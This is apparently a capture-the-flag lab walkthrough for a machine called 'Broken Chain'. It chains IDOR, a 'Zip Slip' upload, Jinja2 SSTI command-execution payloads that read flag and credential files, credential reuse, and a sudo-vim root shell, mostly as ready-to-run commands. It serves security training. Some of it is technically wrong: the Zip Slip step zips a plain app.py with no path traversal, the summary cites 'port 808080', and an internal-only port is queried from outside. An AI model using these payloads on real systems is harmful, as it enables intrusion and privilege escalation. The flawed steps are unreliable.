Lab Icon

Broken Chain

🔗 Can you break through this chain of security controls?

Hard 27 Nov 2025 Free Access Solution Available

A sophisticated web application environment hosts multiple interconnected services with layered security mechanisms. Each security control presents a unique challenge, but when properly chained together, even the most robust defenses can be systematically compromised. 🎯 Time to demonstrate advanced web application penetration testing skills!

2
Flags
70
Points
14%
Success Rate
Start Your Challenge

Launch your dedicated machine to begin hacking

~1-2 min setup
Dedicated server
Private instance
Industry standard
This solution is for Flags Mode

This walkthrough explains how to hack the lab and capture the flags. For help with Learning Mode questions, use the Request Hint button next to each question.

Hard

🔗 Broken Chain - Complete IDOR + Zip Slip + SSTI Solution

Objective: This machine covers IDOR + Zip Slip vulnerability as initial foothold, then port forwarding leads to a backup feature leading to credentials exposure via which we will use SSH as sudo to get root.
🔍 Step 1: Network Reconnaissance

Begin with port scanning to identify running services:

# Port scan reveals SSH and web application
nmap -Pn -sC -sV -p- <target-ip>

# Expected services:
# 22/tcp - SSH
# 8080/tcp - Blog Web Application

Port 8080 hosts the main web service running a blog application.

🔍 Step 2: Blog Application Analysis and IDOR Exploitation

Explore the blog website and exploit IDOR vulnerability:

# Visit the blog application and register
curl http://<target-ip>:8080

# Register a new account
curl -X POST http://<target-ip>:8080/register -d "username=testuser&password=testpass"

# Notice blog IDs start from 2, test for IDOR
curl http://<target-ip>:8080/blog/1
curl http://<target-ip>:8080/blog/2

# Access restricted blog post with ID 1 reveals developer credentials

IDOR vulnerability allows access to restricted blog posts containing sensitive developer credentials.

🔍 Step 3: Administrative Access and Directory Discovery

Use discovered credentials and perform directory enumeration:

# Login with discovered credentials
curl -X POST http://<target-ip>:8080/login -d "username=developer&password=found_password"

# New upload feature appears after login
# Directory enumeration to find hidden endpoints
gobuster dir -u http://<target-ip>:8080 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

# Discover /administrators endpoint

After login, an upload feature appears. Gobuster reveals the hidden /administrators directory with additional upload functionality.

🔍 Step 4: Zip Slip Vulnerability Exploitation

Exploit Zip Slip vulnerability to replace the main application file:

# Create malicious Flask app with SSTI vulnerability
cat > app.py << 'EOF'
from flask import Flask, request, render_template_string
app = Flask(__name__)

@app.route("/")
def home():
    user_input = request.args.get("name", "Guest")
    return render_template_string(f"<h1>Welcome {user_input}</h1>")

if __name__ == "__main__":
    app.run(debug=True)
EOF

# Create zip file and upload to replace original app.py
zip malicious.zip app.py
curl -X POST -F "file=@malicious.zip" http://<target-ip>:8080/administrators/upload

Zip Slip vulnerability allows overwriting the original app.py with a malicious version containing SSTI.

🔍 Step 5: Server-Side Template Injection (SSTI)

Exploit SSTI vulnerability for remote command execution:

# Test SSTI payload for command execution
curl "http://<target-ip>:8080/?name={{config.__class__.__init__.__globals__['os'].popen('ls').read()}}"

# Execute commands to explore the system
curl "http://<target-ip>:8080/?name={{config.__class__.__init__.__globals__['os'].popen('ls /home').read()}}"

# Read user flag and note
curl "http://<target-ip>:8080/?name={{config.__class__.__init__.__globals__['os'].popen('cat /home/ctf/flag-user.txt').read()}}"
curl "http://<target-ip>:8080/?name={{config.__class__.__init__.__globals__['os'].popen('cat /home/ctf/note.txt').read()}}"

SSTI provides remote command execution. The user flag is located in /home/ctf/flag-user.txt and credentials are found in note.txt.

🔍 Step 6: SSH Access and Internal Port Discovery

Use discovered credentials for SSH access and internal reconnaissance:

# SSH login as ctf user
ssh ctf@<target-ip>
# Password from note.txt (also contains backup code)

# Discover internal services
netstat -a
# Reveals uncommon port 45678 running internally

SSH access as ctf user reveals an internal service running on port 45678.

🔍 Step 7: Internal Backup Service Enumeration

Enumerate the internal backup service on port 45678:

# Access internal service locally
curl http://<target-ip>:45678

# Directory enumeration on internal service
gobuster dir -u http://<target-ip>:45678 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

# Discover 2 useful endpoints: /backup and /controlpanel

Internal service provides a backup system with 2 useful endpoints. The /backup endpoint is code protected.

🔍 Step 8: Backup Service Exploitation

Use backup code from note.txt to access backup functionality:

# Access backup service with backup code from note.txt
curl -X POST http://<target-ip>:45678/backup -d "code=backup_code_from_note&path=/home/manager"

# Use control panel to view backed up files
curl http://<target-ip>:45678/controlpanel

# Navigate through backup files to find credentials
# Discover manager account credentials in backup.txt

The backup service requires a backup code and allows accessing manager's files, revealing additional credentials in backup.txt.

🔍 Step 9: Privilege Escalation to Manager

Use discovered manager credentials for lateral movement:

# Switch to manager user
su manager
# Password found in backup.txt

# Check sudo privileges
sudo -l
# Reveals: (ALL) NOPASSWD: /usr/bin/vim

The credentials belong to the manager account, which has sudo privileges to run vim without password.

🔍 Step 10: Root Privilege Escalation via Vim

Exploit sudo vim privileges to gain root access:

# Exploit vim sudo privileges for root shell
sudo vim -c ':!/bin/sh'

# Alternative method
sudo vim
# Then in vim: :!/bin/sh

# Retrieve root flag
cat /root/flag-root.txt

Vim with sudo privileges provides direct path to root shell execution. Root flag is located in /root/flag-root.txt.

🔍 Step 11: Attack Chain Summary

The complete attack chain involves:

  1. Port Scanning: Identify web service on port 808080
  2. IDOR Exploitation: Access restricted blog posts to find developer credentials
  3. Directory Enumeration: Discover hidden /administrators endpoint
  4. Zip Slip Attack: Replace app.py with malicious Flask application
  5. SSTI Exploitation: Execute commands through template injection
  6. Credential Discovery: Find backup code and SSH credentials in note.txt
  7. SSH Access: Login as ctf user for internal access
  8. Port Discovery: Identify internal backup service on port 45678
  9. Backup Exploitation: Use backup service to access manager files
  10. Lateral Movement: Switch to manager user with discovered credentials
  11. Privilege Escalation: Exploit sudo vim to gain root access
Key Vulnerabilities: IDOR for credential discovery, Zip Slip for code replacement, SSTI for RCE, and sudo vim for privilege escalation.
Real-World Application: This challenge demonstrates a realistic attack chain combining web application vulnerabilities (IDOR, Zip Slip, SSTI) with internal service exploitation and privilege escalation techniques commonly found in enterprise environments.